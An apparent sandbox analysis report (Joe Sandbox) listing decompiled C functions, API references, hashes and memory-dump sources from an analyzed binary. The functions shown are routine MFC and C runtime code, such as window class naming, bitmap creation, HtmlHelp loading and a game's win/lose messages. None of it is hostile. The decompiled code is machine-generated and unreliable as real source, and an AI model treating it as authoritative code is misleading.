      • Opcode ID: 22371a54a10e43dd47d2a9f8b5ac848c3d98b0b159ff1e62ac718eb5c635d35b
      • Instruction ID: e0c272e249152eec1e5019898f977349c727e3ca10e2b7404f7b18a9640cd9a3
      • Opcode Fuzzy Hash: 22371a54a10e43dd47d2a9f8b5ac848c3d98b0b159ff1e62ac718eb5c635d35b
      • Instruction Fuzzy Hash: A1016231701604ABDB256B75DC89F5B7BBCFB85B08F54452DF08AA2191EA71A801C760
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00AB784E Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 77%
      			E00AB784E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0xb198b0);
				E00AAD340(__ebx, __edi, __esi);
				_t28 = E00AB4284(__ebx, _t31);
				_t12 =  *0xd0d440; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E00AB5091(_t20, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E00AB7801(_t29,  *0xd0d688);
					 *(_t30 - 4) = 0xfffffffe;
					E00AB78BB();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00AB4284(_t20, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E00AACC26(_t25, _t34);
				}
				return E00AAD385(_t29);
			}









      0x00ab784e
      0x00ab784e
      0x00ab784e
      0x00ab784e
      0x00ab784e
      0x00ab7850
      0x00ab7855
      0x00ab785f
      0x00ab7861
      0x00ab7869
      0x00ab788d
      0x00ab788f
      0x00ab7895
      0x00ab789f
      0x00ab78aa
      0x00ab78ad
      0x00ab78b4
      0x00ab786b
      0x00ab786b
      0x00ab786f
      0x00000000
      0x00ab7871
      0x00ab7876
      0x00ab7876
      0x00ab786f
      0x00ab7879
      0x00ab787b
      0x00ab787d
      0x00ab787f
      0x00ab7884
      0x00ab788c

      APIs
      • __getptd.LIBCMT ref: 00AB785A
        • Part of subcall function 00AB4284: __getptd_noexit.LIBCMT ref: 00AB4287
        • Part of subcall function 00AB4284: __amsg_exit.LIBCMT ref: 00AB4294
      • __getptd.LIBCMT ref: 00AB7871
      • __amsg_exit.LIBCMT ref: 00AB787F
      • __lock.LIBCMT ref: 00AB788F
      • __updatetlocinfoEx_nolock.LIBCMT ref: 00AB78A3
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
      • String ID:
      • API String ID: 938513278-0
      • Opcode ID: d9b9560ffe1d0902301e967c764cefcb2d1335aef5ea8c1abe0e24b062506d99
      • Instruction ID: 964ce8e4116985e68f93841a5af81259e4456b7cf039134685909cc261c6dc53
      • Opcode Fuzzy Hash: d9b9560ffe1d0902301e967c764cefcb2d1335aef5ea8c1abe0e24b062506d99
      • Instruction Fuzzy Hash: 4BF02432908310DBEB21BFF49A0B7CC3BA8AF44720F100109F045AB2D3DBB45880DAB6
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009C998C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108COMMON
      Download Yara Rule
      C-Code - Quality: 83%
      			E009C998C(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				struct tagRECT _v24;
				intOrPtr _v28;
				long _v32;
				intOrPtr _v44;
				char _v48;
				char* _v56;
				intOrPtr _v64;
				char _v96;
				intOrPtr _v108;
				intOrPtr _v112;
				char _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t36;
				char _t41;
				intOrPtr _t42;
				void* _t47;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				signed int _t84;

				_t72 = __edx;
				_t82 = _t84;
				_t36 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t36 ^ _t84;
				_t59 = _a8;
				_v28 = _a4;
				_t77 = __ecx;
				E00AAB3F0( &_v48, 0, 0x14);
				_t41 =  *((intOrPtr*)(_t77 + 0x80));
				_v32 = 0;
				_v44 = _a8;
				if(_t41 == 0) {
					_t41 =  *((intOrPtr*)(_t77 + 0x70));
				}
				_v48 = _t41;
				_t42 =  *((intOrPtr*)(_t77 + 0x7c));
				_t91 = _t42;
				if(_t42 == 0) {
					_t42 = 0xad7b14;
				}
				_t63 = _t42;
				_t60 = E009BB845(_t59, _t42, 0, _t77, _t91);
				if(_t60 != 0) {
					_t78 =  *((intOrPtr*)(_t77 + 0x64));
					__eflags = _t78;
					if(_t78 == 0) {
						E00AAB3F0( &_v96, 0, 0x30);
						_v64 = 0x44000000;
						E009AFF05(_t60, _t63, 0, _t78, __eflags, 8);
						_v56 = "AfxFrameOrView100s";
						_t47 = E009BD77F(_t60, 0, _t78, __eflags);
						_push( &_v136);
						_push(_v56);
						_push( *((intOrPtr*)(_t47 + 8)));
						__eflags = E009A6ACA( &_v136, _t78, __eflags);
						if(__eflags == 0) {
							goto L10;
						} else {
							_t52 = E009AFC32( &_v136, __eflags, _v136, _v112, _v108, 0);
							_v24.left = 0;
							_v24.top = 0;
							_v24.right = 0;
							_v24.bottom = 0;
							SetRectEmpty( &_v24);
							_t56 =  *((intOrPtr*)( *_t60 + 0x160))(_t52, 0xad8d30, _v64,  &_v24, _v28, 0, 0,  &_v48);
							goto L9;
						}
					} else {
						_t56 =  *((intOrPtr*)( *_t60 + 0x164))(_t78, 0x44000000, _v28,  &_v48);
						L9:
						__eflags = _t56;
						if(_t56 == 0) {
							goto L6;
						} else {
							L10:
							_t50 = _t60;
						}
					}
				} else {
					L6:
					_t50 = 0;
				}
				_pop(_t75);
				_pop(_t79);
				_pop(_t61);
				return E00AAB46A(_t50, _t61, _v8 ^ _t82, _t72, _t75, _t79);
			}


































      0x009c998c
      0x009c998f
      0x009c9997
      0x009c999e
      0x009c99a5
      0x009c99ac
      0x009c99b6
      0x009c99b8
      0x009c99bd
      0x009c99c6
      0x009c99c9
      0x009c99ce
      0x009c99d0
      0x009c99d0
      0x009c99d3
      0x009c99d6
      0x009c99d9
      0x009c99db
      0x009c99dd
      0x009c99dd
      0x009c99e2
      0x009c99e9
      0x009c99ed
      0x009c99f3
      0x009c99f6
      0x009c99f8
      0x009c9a2f
      0x009c9a39
      0x009c9a40
      0x009c9a45
      0x009c9a4c
      0x009c9a5a
      0x009c9a5b
      0x009c9a5e
      0x009c9a67
      0x009c9a69
      0x00000000
      0x009c9a6b
      0x009c9a78
      0x009c9a83
      0x009c9a86
      0x009c9a89
      0x009c9a8c
      0x009c9a8f
      0x009c9aaf
      0x00000000
      0x009c9aaf
      0x009c99fa
      0x009c9a0b
      0x009c9a11
      0x009c9a11
      0x009c9a13
      0x00000000
      0x009c9a15
      0x009c9a15
      0x009c9a15
      0x009c9a15
      0x009c9a13
      0x009c99ef
      0x009c99ef
      0x009c99ef
      0x009c99ef
      0x009c9a1a
      0x009c9a1b
      0x009c9a1e
      0x009c9a25

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _memset$EmptyRect
      • String ID: AfxFrameOrView100s
      • API String ID: 3779055983-3095774114
      • Opcode ID: 64851302462db2fc24e08f379b28dce1b64364c88a540a287004cdd9248a7da8
      • Instruction ID: e69406bb258bf7b8a2f24550dbedd14883549698c3c358ccdb82cdfb93ff94b6
      • Opcode Fuzzy Hash: 64851302462db2fc24e08f379b28dce1b64364c88a540a287004cdd9248a7da8
      • Instruction Fuzzy Hash: 27315B71E00209AFCF11DFA9C889EEEBBB9FB89344F104429F555A7251EB309D04CB61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A6040 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 94COMMON
      Download Yara Rule
      C-Code - Quality: 57%
      			E009A6040(void* __edx, intOrPtr _a4) {
				RECT* _v8;
				char _v16;
				char _v20;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t29;
				intOrPtr* _t32;
				void* _t37;
				intOrPtr* _t42;
				void* _t45;
				char _t46;
				void* _t48;
				struct HWND__* _t54;
				void* _t68;
				signed int _t70;
				intOrPtr* _t71;

				_push(0xffffffff);
				_push(0xac7c98);
				_push( *[fs:0x0]);
				_push(_t48);
				_push(_t45);
				_t29 =  *0xd0c910; // 0x3a0e8b0c
				_push(_t29 ^ _t70);
				 *[fs:0x0] =  &_v16;
				_t68 = _t48;
				_t32 = E009B9D52();
				_t71 = _t32;
				_t50 = 0 | _t71 == 0x00000000;
				if(_t71 == 0) {
					_t32 = E009A54F0(_t45, _t50, __edx, 0, _t68, 0x80004005);
				}
				_t61 =  *_t32;
				_v20 =  *((intOrPtr*)( *((intOrPtr*)( *_t32 + 0xc))))() + 0x10;
				_t37 = _a4 - 1;
				_v8 = 0;
				if(_t37 == 0) {
					if( *((intOrPtr*)(_t68 + 0x7c)) != 9) {
						_push(8);
						_push("You Win!");
					} else {
						_push(5);
						_push("Draw!");
					}
					goto L8;
				} else {
					if(_t37 != 1) {
						L9:
						_t46 = _v20;
						E009ABD1F(_t46, _t68, 0, _t46, 0, 0);
						 *((intOrPtr*)(_t68 + 0x178)) = 0;
						 *((intOrPtr*)(_t68 + 0x17c)) = 0;
						 *((intOrPtr*)(_t68 + 0x180)) = 0;
						 *((intOrPtr*)(_t68 + 0x184)) = 0;
						 *((intOrPtr*)(_t68 + 0x188)) = 0;
						 *((intOrPtr*)(_t68 + 0x18c)) = 0;
						 *((intOrPtr*)(_t68 + 0x190)) = 0;
						 *((intOrPtr*)(_t68 + 0x194)) = 0;
						 *((intOrPtr*)(_t68 + 0x198)) = 0;
						 *((intOrPtr*)(_t68 + 0x19c)) = 0;
						_t54 =  *(_t68 + 0x20);
						InvalidateRect(_t54, 0, 1);
						_t42 = _t46 - 0x10;
						_v8 = 0xffffffff;
						asm("lock xadd [edx], ecx");
						if((_t54 | 0xffffffff) - 1 <= 0) {
							_t42 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t42)) + 4))))(_t42);
						}
						 *[fs:0x0] = _v16;
						return _t42;
					}
					_push(9);
					_push("You Lose!");
					L8:
					E009A5F60( &_v20, _t61, 0);
					 *((intOrPtr*)(_t68 + 0x7c)) = 0;
					goto L9;
				}
			}






















      0x009a6043
      0x009a6045
      0x009a6050
      0x009a6051
      0x009a6052
      0x009a6055
      0x009a605c
      0x009a6060
      0x009a6066
      0x009a6068
      0x009a6071
      0x009a6073
      0x009a6078
      0x009a607f
      0x009a607f
      0x009a6084
      0x009a6090
      0x009a6096
      0x009a6097
      0x009a609a
      0x009a60ac
      0x009a60b7
      0x009a60b9
      0x009a60ae
      0x009a60ae
      0x009a60b0
      0x009a60b0
      0x00000000
      0x009a609c
      0x009a609d
      0x009a60c9
      0x009a60c9
      0x009a60d1
      0x009a60d8
      0x009a60de
      0x009a60e4
      0x009a60ea
      0x009a60f0
      0x009a60f6
      0x009a60fc
      0x009a6102
      0x009a6108
      0x009a6110
      0x009a6116
      0x009a611b
      0x009a6121
      0x009a6124
      0x009a6131
      0x009a6138
      0x009a6142
      0x009a6142
      0x009a6147
      0x009a6155
      0x009a6155
      0x009a609f
      0x009a60a1
      0x009a60be
      0x009a60c1
      0x009a60c6
      0x00000000
      0x009a60c6

      APIs
      • InvalidateRect.USER32(?,00000000,00000001,?,00000000,00000000,You Win!,00000008), ref: 009A611B
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: InvalidateRect
      • String ID: Draw!$You Lose!$You Win!
      • API String ID: 634782764-330078758
      • Opcode ID: 67ae2a2dfd2ede96bdc703317c64f8124f009732682ac1b9e2db03227c5c8ff2
      • Instruction ID: 13e28758ae9d832430a2623379118c9f59cdbdc17fdfb83cf96a5aa16aeee56f
      • Opcode Fuzzy Hash: 67ae2a2dfd2ede96bdc703317c64f8124f009732682ac1b9e2db03227c5c8ff2
      • Instruction Fuzzy Hash: 60316571604B05AFC764CF29C845FAAB7E4FB89710F148A2EE56AD7290EB706940CF90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AFC32 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
      Download Yara Rule
      C-Code - Quality: 75%
      			E009AFC32(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t34;
				intOrPtr* _t36;
				intOrPtr* _t37;
				void* _t39;
				intOrPtr* _t53;
				void* _t55;
				intOrPtr _t56;
				void* _t59;
				void* _t61;
				intOrPtr _t62;

				_t1 = E009BD1B0(_t55, _t59, _t61, __eflags) + 0x7c; // 0x7c
				_t62 = _t1;
				_t56 =  *((intOrPtr*)(E009BD77F(_t55, _t59, _t62, __eflags) + 8));
				if(_a8 != 0 || _a12 != 0) {
					L4:
					_v8 =  *((intOrPtr*)(E00AADB06(__eflags)));
					_t34 = E00AADB06(__eflags);
					_push(_a16);
					 *_t34 = 0;
					_push(_a12);
					_push(_a8);
					_push(_a4);
					E00AADA2A(_t62, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t56);
					goto L5;
				} else {
					_t69 = _a16;
					if(_a16 != 0) {
						goto L4;
					}
					_v8 =  *((intOrPtr*)(E00AADB06(_t69)));
					_t53 = E00AADB06(_t69);
					_push(_a4);
					 *_t53 = 0;
					E00AADA2A(_t62, 0x60, 0x5f, "Afx:%p:%x", _t56);
					L5:
					_t36 = E00AADB06(_t69);
					_t70 =  *_t36;
					if( *_t36 == 0) {
						_t37 = E00AADB06(__eflags);
						_t58 = _v8;
						 *_t37 = _v8;
					} else {
						E009A9F23( *((intOrPtr*)(E00AADB06(_t70))));
						_pop(_t58);
					}
					_push( &_v48);
					_push(_t62);
					_push(_t56);
					_t39 = E009A6ACA(_t58, _t62, _t70);
					_t71 = _t39;
					if(_t39 == 0) {
						_v48 = _a4;
						_v44 = DefWindowProcA;
						_v28 = _a16;
						_v24 = _a8;
						_v20 = _a12;
						_push( &_v48);
						_v36 = 0;
						_v40 = 0;
						_v32 = _t56;
						_v16 = 0;
						_v12 = _t62;
						if(E009AFBA4(_t56, _t58, 0, _t62, _t71) == 0) {
							E009BA563(_t58);
						}
					}
					return _t62;
				}
			}




























      0x009afc42
      0x009afc42
      0x009afc4a
      0x009afc52
      0x009afc87
      0x009afc8e
      0x009afc91
      0x009afc96
      0x009afc99
      0x009afc9b
      0x009afc9e
      0x009afca1
      0x009afcaf
      0x00000000
      0x009afc59
      0x009afc59
      0x009afc5c
      0x00000000
      0x00000000
      0x009afc65
      0x009afc68
      0x009afc6d
      0x009afc70
      0x009afc7d
      0x009afcb7
      0x009afcb7
      0x009afcbc
      0x009afcbe
      0x009afccf
      0x009afcd4
      0x009afcd7
      0x009afcc0
      0x009afcc7
      0x009afccc
      0x009afccc
      0x009afcdc
      0x009afcdd
      0x009afcde
      0x009afcdf
      0x009afce7
      0x009afce9
      0x009afcee
      0x009afcf6
      0x009afcfc
      0x009afd02
      0x009afd08
      0x009afd0e
      0x009afd0f
      0x009afd12
      0x009afd15
      0x009afd18
      0x009afd1b
      0x009afd25
      0x009afd27
      0x009afd27
      0x009afd25
      0x009afd32
      0x009afd32

      APIs
      • __snwprintf_s.LIBCMT ref: 009AFC7D
      • __snwprintf_s.LIBCMT ref: 009AFCAF
        • Part of subcall function 00AADB06: __getptd_noexit.LIBCMT ref: 00AADB06
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: __snwprintf_s$__getptd_noexit
      • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
      • API String ID: 101746997-2801496823
      • Opcode ID: 368503709f88e672bb5578f1f944c1304e91028ddb01340f3df3abf1f8c49384
      • Instruction ID: 79e47112adfd36590b4c6bb27834e12e2c343a249a3bb6c60fa499467f513a4c
      • Opcode Fuzzy Hash: 368503709f88e672bb5578f1f944c1304e91028ddb01340f3df3abf1f8c49384
      • Instruction Fuzzy Hash: AE314171D00208AFCB51EFA5C941ADE7BB9EF5A360F108426F955A7251E7348E10CBA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009BE955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72windowCOMMON
      Download Yara Rule
      C-Code - Quality: 79%
      			E009BE955(intOrPtr __ebx, struct HDC__* _a4) {
				signed int _v8;
				void _v40;
				unsigned int _v98;
				char _v99;
				char _v100;
				unsigned int _v102;
				char _v103;
				char _v104;
				struct tagBITMAPINFOHEADER _v144;
				void* __edi;
				void* __esi;
				signed int _t24;
				unsigned int _t30;
				unsigned int _t31;
				signed int _t32;
				struct HBITMAP__* _t36;
				intOrPtr _t55;
				struct HDC__* _t57;
				intOrPtr _t58;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t63;
				signed int _t65;

				_t63 = _t65;
				_t24 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t24 ^ _t63;
				_t57 = _a4;
				E00AAB3F0( &_v144, 0, 0x68);
				_v144.biCompression = _v144.biCompression & 0x00000000;
				_v144.biPlanes = 1;
				_v144.biBitCount = 1;
				_t30 =  *0xd0fdc4; // 0xf0f0f0
				_v104 = _t30 >> 0x10;
				_t60 = 8;
				_v144.biSize = 0x28;
				_v144.biWidth = _t60;
				_v144.biHeight = _t60;
				_v103 = _t30 >> 8;
				_v102 = _t30;
				_t31 = GetSysColor(0x14);
				_v100 = _t31 >> 0x10;
				_v98 = _t31;
				_v99 = _t31 >> 8;
				_t32 = 0;
				do {
					asm("sbb ecx, ecx");
					 *((intOrPtr*)(_t63 + _t32 * 4 - 0x24)) = ( ~(_t32 & 0x00000001) & 0x5554aaab) + 0x5555aaaa;
					_t32 = _t32 + 1;
				} while (_t32 < _t60);
				_t36 = CreateDIBitmap(_t57,  &_v144, 4,  &_v40,  &_v144, 0);
				_pop(_t58);
				_pop(_t61);
				return E00AAB46A(_t36, __ebx, _v8 ^ _t63, _t55, _t58, _t61);
			}


























      0x009be958
      0x009be960
      0x009be967
      0x009be96c
      0x009be97a
      0x009be97f
      0x009be986
      0x009be98a
      0x009be98e
      0x009be99d
      0x009be9a0
      0x009be9a8
      0x009be9b2
      0x009be9b8
      0x009be9be
      0x009be9c1
      0x009be9c4
      0x009be9cf
      0x009be9d7
      0x009be9da
      0x009be9dd
      0x009be9df
      0x009be9e9
      0x009be9f7
      0x009be9fb
      0x009be9fc
      0x009bea17
      0x009bea20
      0x009bea23
      0x009bea2a

      APIs
      • _memset.LIBCMT ref: 009BE97A
      • GetSysColor.USER32(00000014), ref: 009BE9C4
      • CreateDIBitmap.GDI32(?,00000028,00000004,?,00000028,00000000), ref: 009BEA17
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: BitmapColorCreate_memset
      • String ID: (
      • API String ID: 3930187609-3887548279
      • Opcode ID: 2e6cc2f4499948f462461c02b601f657505ba951d2384b2d2f79017b74379c17
      • Instruction ID: b3f119a399d22b3e61e8488d4234887028b5288991032cef8db1430257cb4a8b
      • Opcode Fuzzy Hash: 2e6cc2f4499948f462461c02b601f657505ba951d2384b2d2f79017b74379c17
      • Instruction Fuzzy Hash: A821F531A11258DFDB04CBB8CD16BEDBBF8AB55700F00846EE646EB281DB355A48CB70
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AE2AD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON
      Download Yara Rule
      C-Code - Quality: 89%
      			E009AE2AD(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				E009C2A0C(0xc);
				_push(E009AD4C4);
				_t26 = E009BC8C9(__ebx, 0xd0fb68, __edi, _t25, _t27);
				if(_t26 == 0) {
					E009B8782(0xd0fb68);
				}
				_t29 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E009C2A7E(0xc);
					return  *(_t26 + 8)(_a4, _a8, _a12, _a16);
				} else {
					_push(L"hhctrl.ocx");
					_t16 = E009AB76B(0xd0fb68, _t26, _t29);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						 *(_t26 + 8) = _t17;
						__eflags = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}










      0x009ae2ad
      0x009ae2b5
      0x009ae2ba
      0x009ae2c9
      0x009ae2cd
      0x009ae2cf
      0x009ae2cf
      0x009ae2d4
      0x009ae2d8
      0x009ae312
      0x009ae314
      0x00000000
      0x009ae2da
      0x009ae2da
      0x009ae2df
      0x009ae2e5
      0x009ae2ea
      0x009ae2f6
      0x009ae2fc
      0x009ae2ff
      0x009ae301
      0x00000000
      0x00000000
      0x009ae306
      0x009ae30c
      0x009ae30c
      0x00000000
      0x009ae2ec

      APIs
        • Part of subcall function 009C2A0C: EnterCriticalSection.KERNEL32(00D10188,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A46
        • Part of subcall function 009C2A0C: InitializeCriticalSection.KERNEL32(?,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A58
        • Part of subcall function 009C2A0C: LeaveCriticalSection.KERNEL32(00D10188,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A65
        • Part of subcall function 009C2A0C: EnterCriticalSection.KERNEL32(?,?,?,?,?,009BC8E4,00000010,00000008,009BD7AD,009BD744,009AB424,009B0613,?,009AB86C,?,009A8EAA), ref: 009C2A75
        • Part of subcall function 009BC8C9: __EH_prolog3_catch.LIBCMT ref: 009BC8D0
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 009AE2F6
      • FreeLibrary.KERNEL32(?), ref: 009AE306
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
